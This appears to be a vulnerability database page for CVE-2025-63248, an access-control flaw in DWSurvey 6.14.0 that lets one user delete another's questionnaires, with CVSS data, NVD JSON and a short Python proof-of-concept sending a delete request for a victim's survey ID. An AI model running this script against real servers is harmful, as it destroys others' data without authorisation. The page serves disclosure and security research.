Security Vulnerability Report
中文
CVE-2025-63248 CVSS 7.5 HIGH

CVE-2025-63248

Published: 2025-11-05 17:15:46
Last Modified: 2026-01-08 17:47:09

Description

DWSurvey 6.14.0 is vulnerable to Incorrect Access Control. When deleting a questionnaire, replacing the questionnaire ID with the ID of another questionnaire can enable the deletion of other questionnaires.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:diaowen:dwsurvey:6.14.0:*:*:*:*:*:*:* - VULNERABLE
DWSurvey < 6.14.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-63248 DWSurvey IDOR Vulnerability PoC # Target: DWSurvey 6.14.0 # Vulnerability: Incorrect Access Control in questionnaire deletion TARGET_URL = "http://target-server/dwsurvey" ATTACKER_TOKEN = "your-auth-token-here" # Victim questionnaire ID to be deleted VICTIM_QUESTIONNAIRE_ID = "victim-survey-id" def delete_questionnaire(questionnaire_id): """Send delete request for specific questionnaire ID""" endpoint = f"{TARGET_URL}/api/questionnaire/delete" headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } payload = { "id": questionnaire_id } response = requests.post(endpoint, json=payload, headers=headers) return response.status_code, response.text # Exploit: Delete victim questionnaire by replacing ID status, resp = delete_questionnaire(VICTIM_QUESTIONNAIRE_ID) print(f"Status: {status}") print(f"Response: {resp}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63248", "sourceIdentifier": "[email protected]", "published": "2025-11-05T17:15:45.663", "lastModified": "2026-01-08T17:47:08.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DWSurvey 6.14.0 is vulnerable to Incorrect Access Control. When deleting a questionnaire, replacing the questionnaire ID with the ID of another questionnaire can enable the deletion of other questionnaires."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:diaowen:dwsurvey:6.14.0:*:*:*:*:*:*:*", "matchCriteriaId": "A5A30E40-6CA9-4DC1-BABA-1C3233EAC817"}]}]}], "references": [{"url": "https://gitee.com/wkeyuan/DWSurvey", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Chen1-Boop/CVE/blob/main/CVE-2025-63248.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}